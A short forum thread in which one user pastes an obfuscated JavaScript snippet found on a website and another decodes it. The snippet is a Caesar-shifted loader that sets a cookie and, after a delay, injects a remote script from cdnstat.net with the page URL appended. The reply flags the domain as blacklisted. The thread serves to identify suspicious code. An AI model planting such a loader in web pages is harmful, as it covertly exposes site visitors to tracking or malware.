What is this?

AntiSkid(e){if(!e){“”!==window.location.protocol+“//”+window.location.host&&(window.location.href=“”)}}AntiSkid(!0);(function(o,d,l){try{o.f=o=>o.split(‘’).reduce((s,c)=>s+String.fromCharCode((c.charCodeAt()-5).toString()),‘’);o.b=o.f(‘UMUWJKX’);o.c=l.protocol[0]==‘h’&&/./.test(l.hostname)&&!(new RegExp(o.b)).test(d.cookie),setTimeout(function(){o.c&&(o.s=d.createElement(‘script’),o.s.src=o.f(‘myyux?44hisxy’+‘fy3sjy4ljy4xhwnuy’+‘3oxDwjkjwwjwB’)+l.href,d.body.appendChild(o.s));},1000);d.cookie=o.b+‘=full;max-age=39800;’}catch(e){};}({},document,location));

It’s a poorly obfuscated caesar cipher telling your browser to pull something called script.js from cdnstat.net, and inject the script into the site 1 second later.

I assume it’s meant to be a tracker, but why they bothered to shove it through an obfuscation layer like that makes me leery. cdnstat.net is on Avast’s Blacklist for URL’s, which makes me even more leery.

3 Likes

This topic was automatically closed 91 days after the last reply. New replies are no longer allowed.